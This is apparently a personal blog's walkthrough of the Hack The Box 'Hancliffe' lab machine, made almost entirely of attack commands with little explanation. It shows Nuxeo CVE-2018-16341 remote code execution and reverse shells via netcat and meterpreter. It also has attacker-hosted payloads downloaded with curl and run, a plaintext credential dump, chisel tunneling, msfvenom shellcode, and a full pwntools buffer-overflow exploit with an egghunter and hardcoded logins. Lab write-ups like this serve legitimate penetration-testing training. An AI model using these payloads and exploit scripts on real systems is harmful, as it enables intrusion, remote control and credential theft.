Hack_The_Box_Writeups

HackTheBox – Hancliffe Walkthrough – In English

┌──(root💀kali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.115

http://10.10.11.115/

http://10.10.11.115:8000

┌──(root💀kali)-[/home/kali/Downloads]

└─# cat /etc/hosts | grep 10.10.11.115

┌──(root💀kali)-[/home/kali/Downloads]

└─# gobuster dir -u hancliffe.htb -w /usr/share/wordlists/dirb/common.txt -b 404

http://hancliffe.htb/maintenance

https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-files.txt

┌──(root💀kali)-[/home/kali/Downloads]

└─# gobuster dir -u hancliffe.htb/maintenance -w /opt/SecLists/Discovery/Web-Content/raft-small-files.txt -b 404,502

┌──(root💀kali)-[/home/kali/Downloads]

└─# ffuf -u “http://10.10.11.115/maintenance/..;/FUZZ” -mc 200 -w /home/kali/Downloads/SecLists/Discovery/Web-Content/raft-small-files.txt

http://hancliffe.htb/maintenance/..;/home.html

http://hancliffe.htb/maintenance/..;/login.jsp

┌──(root💀kali)-[/home/kali/Downloads]

└─# searchsploit Nuxeo

https://github.com/mpgn/CVE-2018-16341

┌──(root💀kali)-[/home/kali/Downloads]

└─# git clone https://github.com/mpgn/CVE-2018-16341.git 

https://gist.githubusercontent.com/HSNHK/c2035b1f22e886dd9cf4dc704a30f489/raw/625cba59adce12fa6a9d6bf507c00de56d88c95c/Hancliffe-CVE-2018%E2%80%9316341.py

┌──(root💀kali)-[/home/kali/Downloads/CVE-2018-16341]

└─# python3 ./CVE-2018-16341.py

command (WIN)> whoami

https://www.revshells.com/

┌──(root💀kali)-[/home/kali/Downloads]

└─# nc -lvnp 1234

As you can see, we have ‘svc_account’ shell. As I said, this is not a interactive shell, just a POC. However, we can gain powershell access via this POC. We need base64 encoded powershell payload. You can craft it via RevShells website, choose powershell #3 (base64)

PS C:\Nuxeo> whoami

https://github.com/carlospolop/PEASS-ng/releases/tag/refs/pull/253/merge

┌──(root💀kali)-[/home/kali/Downloads]

└─# python3 -m http.server 8000

PS C:\Nuxeo> curl 10.10.14.4:8000/winPEASx64.exe -o winPEASx641.exe

PS C:\Nuxeo> .\winPEASx641.exe

When we run winpeas, we see a lot of information. One of the above services, which listens on port 9512, is vulnerable.

┌──(root💀kali)-[/home/kali/Downloads]

└─# searchsploit ‘unified remote 3’

msf6 > use /exploit/multi/handler

msf6 exploit(multi/handler) > use payload/windows/x64/meterpreter/reverse_tcp

msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 10.10.14.4

msf6 payload(windows/x64/meterpreter/reverse_tcp) > show options

msf6 payload(windows/x64/meterpreter/reverse_tcp) > generate -f exe -o reverse.exe

msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/multi/handler

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp

msf6 exploit(multi/handler) > set lhost 10.10.14.4

msf6 exploit(multi/handler) > exploit

PS C:\Nuxeo> curl 10.10.14.4:8000/reverse.exe -o rev.exe

PS C:\Nuxeo> .\rev.exe

meterpreter > getuid

meterpreter > portfwd add -l 9512 -p 9512 -r 10.10.11.115

┌──(root💀kali)-[/home/kali/Downloads]

└─# netstat –nlpt

meterpreter > background

msf6 exploit(multi/handler) > exploit

┌──(root💀kali)-[/home/kali/Downloads]

└─# locate 49587.py

┌──(root💀kali)-[/home/kali/Downloads]

└─# python3 -m http.server 80

┌──(root💀kali)-[/home/kali/Downloads]

└─# python2 49587.py 127.0.0.1 10.10.14.4 reverse.exe   

meterpreter > getuid

meterpreter > pwd

meterpreter > cd Desktop

meterpreter > dir

meterpreter > cat user.txt

PS C:\Users\clara> curl 10.10.14.102:80/winPEASx64.exe -o win64.exe

PS C:\Users\clara> .\win64.exe

Url:           http://localhost:8000                                                                                                                               

     Username:      hancliffe.htb                                                                                                                                        

     Password:      #@H@ncLiff3D3velopm3ntM@st3rK3y*! 

http://10.10.11.115:8000/

We get the generated password : AMl.q2DHp?2.C/V0kNFU

PS C:\Users\clara> curl 10.10.14.102:80/chisel.exe -o chisel.exe

┌──(root💀kali)-[/home/kali/Downloads]

└─# ./chisel server -p 8000 –reverse

PS C:\Users\clara>  .\chisel.exe client 10.10.14.102:8000 R:5985:127.0.0.1:5985

┌──(root💀kali)-[/home/kali/Downloads]

└─# evil-winrm -i 127.0.0.1 -u development -p ‘AMl.q2DHp?2.C/V0kNFU’

*Evil-WinRM* PS C:\Users\development\Documents> whoami

*Evil-WinRM* PS C:\Users\development\Documents> cd ..

*Evil-WinRM* PS C:\Users\development> cd ..

*Evil-WinRM* PS C:\Users> cd ..

┌──(root💀kali)-[/home/kali/Downloads]

└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.102 LPORT=7575 -b “\x00” EXITFUNC=thread -f python

Output:

buf =  b””

buf += b”\xd9\xcb\xd9\x74\x24\xf4\xbb\xd3\x47\x73\xbc\x5d\x31″

buf += b”\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x8e\x54\x91″

buf += b”\x49\xcc\xb3\xd7\xb2\x2c\x44\xb8\x3b\xc9\x75\xf8\x58″

buf += b”\x9a\x26\xc8\x2b\xce\xca\xa3\x7e\xfa\x59\xc1\x56\x0d”

buf += b”\xe9\x6c\x81\x20\xea\xdd\xf1\x23\x68\x1c\x26\x83\x51″

buf += b”\xef\x3b\xc2\x96\x12\xb1\x96\x4f\x58\x64\x06\xfb\x14″

buf += b”\xb5\xad\xb7\xb9\xbd\x52\x0f\xbb\xec\xc5\x1b\xe2\x2e”

buf += b”\xe4\xc8\x9e\x66\xfe\x0d\x9a\x31\x75\xe5\x50\xc0\x5f”

buf += b”\x37\x98\x6f\x9e\xf7\x6b\x71\xe7\x30\x94\x04\x11\x43″

buf += b”\x29\x1f\xe6\x39\xf5\xaa\xfc\x9a\x7e\x0c\xd8\x1b\x52″

buf += b”\xcb\xab\x10\x1f\x9f\xf3\x34\x9e\x4c\x88\x41\x2b\x73″

buf += b”\x5e\xc0\x6f\x50\x7a\x88\x34\xf9\xdb\x74\x9a\x06\x3b”

buf += b”\xd7\x43\xa3\x30\xfa\x90\xde\x1b\x93\x55\xd3\xa3\x63″

buf += b”\xf2\x64\xd0\x51\x5d\xdf\x7e\xda\x16\xf9\x79\x1d\x0d”

buf += b”\xbd\x15\xe0\xae\xbe\x3c\x27\xfa\xee\x56\x8e\x83\x64″

buf += b”\xa6\x2f\x56\x2a\xf6\x9f\x09\x8b\xa6\x5f\xfa\x63\xac”

buf += b”\x6f\x25\x93\xcf\xa5\x4e\x3e\x2a\x2e\x7b\xb5\x3a\xc8″

buf += b”\x13\xcb\x42\x09\x73\x42\xa4\x5b\x6b\x03\x7f\xf4\x12″

buf += b”\x0e\x0b\x65\xda\x84\x76\xa5\x50\x2b\x87\x68\x91\x46″

buf += b”\x9b\x1d\x51\x1d\xc1\x88\x6e\x8b\x6d\x56\xfc\x50\x6d”

buf += b”\x11\x1d\xcf\x3a\x76\xd3\x06\xae\x6a\x4a\xb1\xcc\x76″

buf += b”\x0a\xfa\x54\xad\xef\x05\x55\x20\x4b\x22\x45\xfc\x54″

buf += b”\x6e\x31\x50\x03\x38\xef\x16\xfd\x8a\x59\xc1\x52\x45″

buf += b”\x0d\x94\x98\x56\x4b\x99\xf4\x20\xb3\x28\xa1\x74\xcc”

buf += b”\x85\x25\x71\xb5\xfb\xd5\x7e\x6c\xb8\xf6\x9c\xa4\xb5″

buf += b”\x9e\x38\x2d\x74\xc3\xba\x98\xbb\xfa\x38\x28\x44\xf9″

buf += b”\x21\x59\x41\x45\xe6\xb2\x3b\xd6\x83\xb4\xe8\xd7\x81″

Reference Link: https://7rocky.github.io/en/htb/hancliffe/

Exploit.py

from pwn import *

io = remote(‘hancliffe.htb’, 9999)

offset     = 66

jmp_eax    = p32(0x719023b3)

#sub    sp,0x150

egghunter = (b”\x66\x81\xEC\x50\x01\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53″

b”\x53\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08″

b”\x3c\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75″

b”\xd7\xff\xe7″)

#msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.74 LPORT=7575 -b “\x00” EXITFUNC=thread -f python

buf =  b””

buf += b”\xd9\xcb\xd9\x74\x24\xf4\xbb\xd3\x47\x73\xbc\x5d\x31″

buf += b”\xc9\xb1\x52\x31\x5d\x17\x83\xed\xfc\x03\x8e\x54\x91″

buf += b”\x49\xcc\xb3\xd7\xb2\x2c\x44\xb8\x3b\xc9\x75\xf8\x58″

buf += b”\x9a\x26\xc8\x2b\xce\xca\xa3\x7e\xfa\x59\xc1\x56\x0d”

buf += b”\xe9\x6c\x81\x20\xea\xdd\xf1\x23\x68\x1c\x26\x83\x51″

buf += b”\xef\x3b\xc2\x96\x12\xb1\x96\x4f\x58\x64\x06\xfb\x14″

buf += b”\xb5\xad\xb7\xb9\xbd\x52\x0f\xbb\xec\xc5\x1b\xe2\x2e”

buf += b”\xe4\xc8\x9e\x66\xfe\x0d\x9a\x31\x75\xe5\x50\xc0\x5f”

buf += b”\x37\x98\x6f\x9e\xf7\x6b\x71\xe7\x30\x94\x04\x11\x43″

buf += b”\x29\x1f\xe6\x39\xf5\xaa\xfc\x9a\x7e\x0c\xd8\x1b\x52″

buf += b”\xcb\xab\x10\x1f\x9f\xf3\x34\x9e\x4c\x88\x41\x2b\x73″

buf += b”\x5e\xc0\x6f\x50\x7a\x88\x34\xf9\xdb\x74\x9a\x06\x3b”

buf += b”\xd7\x43\xa3\x30\xfa\x90\xde\x1b\x93\x55\xd3\xa3\x63″

buf += b”\xf2\x64\xd0\x51\x5d\xdf\x7e\xda\x16\xf9\x79\x1d\x0d”

buf += b”\xbd\x15\xe0\xae\xbe\x3c\x27\xfa\xee\x56\x8e\x83\x64″

buf += b”\xa6\x2f\x56\x2a\xf6\x9f\x09\x8b\xa6\x5f\xfa\x63\xac”

buf += b”\x6f\x25\x93\xcf\xa5\x4e\x3e\x2a\x2e\x7b\xb5\x3a\xc8″

buf += b”\x13\xcb\x42\x09\x73\x42\xa4\x5b\x6b\x03\x7f\xf4\x12″

buf += b”\x0e\x0b\x65\xda\x84\x76\xa5\x50\x2b\x87\x68\x91\x46″

buf += b”\x9b\x1d\x51\x1d\xc1\x88\x6e\x8b\x6d\x56\xfc\x50\x6d”

buf += b”\x11\x1d\xcf\x3a\x76\xd3\x06\xae\x6a\x4a\xb1\xcc\x76″

buf += b”\x0a\xfa\x54\xad\xef\x05\x55\x20\x4b\x22\x45\xfc\x54″

buf += b”\x6e\x31\x50\x03\x38\xef\x16\xfd\x8a\x59\xc1\x52\x45″

buf += b”\x0d\x94\x98\x56\x4b\x99\xf4\x20\xb3\x28\xa1\x74\xcc”

buf += b”\x85\x25\x71\xb5\xfb\xd5\x7e\x6c\xb8\xf6\x9c\xa4\xb5″

buf += b”\x9e\x38\x2d\x74\xc3\xba\x98\xbb\xfa\x38\x28\x44\xf9″

buf += b”\x21\x59\x41\x45\xe6\xb2\x3b\xd6\x83\xb4\xe8\xd7\x81″

payload  = b”

payload += egghunter

payload += b’\x90′ * (offset – len(egghunter))

payload += jmp_eax

payload += b’\x90′ * 50

payload += b’w00tw00t’

payload += buf

io.sendlineafter(‘Username: ‘,’alfiansyah’)

io.sendlineafter(‘Password: ‘, ‘K3r4j@@nM4j@pAh!T’)

io.sendlineafter(‘FullName: ‘, ‘what ever’)

io.sendlineafter(‘Input Your Code: ‘, payload)

┌──(root💀kali)-[/home/kali/Downloads]

└─# nc -lvnp 7575

┌──(root💀kali)-[/home/kali/Downloads]

└─# python3 exploit.py

C:\Windows\system32>cd ..

C:\Windows>cd ..

C:\>cd Users

C:\Users>cd Administrator

C:\Users\Administrator>cd Desktop

C:\Users\Administrator\Desktop>type root.txt

Reference Link: https://7rocky.github.io/en/htb/hancliffe/

Hi, I’m saksham dixit

Leave a Reply

Your email address will not be published. Required fields are marked *